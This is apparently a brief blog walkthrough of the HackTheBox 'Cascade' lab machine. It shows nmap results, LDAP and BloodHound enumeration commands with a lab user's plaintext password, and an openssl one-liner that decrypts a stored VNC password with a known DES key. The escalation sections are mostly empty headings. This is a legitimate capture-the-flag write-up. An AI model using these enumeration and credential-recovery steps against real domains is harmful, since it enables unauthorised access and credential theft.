HackTheBox-Cascade

NMAP

PORT      STATE SERVICE       VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-26 11:29:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-12-26T11:30:38
|_ start_date: 2021-12-26T11:26:31

PORT 139/445 (SMB)

/opt/windap/windapsearch-linux-amd64 -d cascade.local -m users | grep sAMAccountName | awk -F:' ' {'print $2'}

Foothold

ldapsearch -x -LLL -h 10.10.10.182 -D 'cn=USER,ou=users,dc=cascade,dc=local' -b "dc=cascade,dc=local"
cat ldap_info | grep cascade
python3 /opt/Python-Bloodhound/bloodhound.py -d cascade.local -u 'r.thompson' -p 'rY4n5eva' -c all -ns 10.10.10.182

Privilege Escalation (s.smith)

echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

Privilege Escalation (arksvc)

Privilege Escalation (Administrator)

References

--

--

--

Pentester | CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Application Security Is Taking Center Stage

The Joke’s On You

Egress Filtering in Serverless Applications

Mobula — The Mobula Data Aggregator (Alpha version)

Hosting area for making a website

According to reports, the largest office of the bithumb cryptocurrency exchange in South Korea in…

Analysis of Common Federated Identity Protocols: OpenID Connect vs OAuth 2.0 vs SAML 2.0

Chinese Apps and Their Privacy Issues

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ARZ101

ARZ101

Pentester | CTF Player

More from Medium

HackTheBox-Object

Plotted-TMS Writeup

Devzat — Hackthebox walkthrough

VulnHub’s Unknowndevice64:A Walkthrough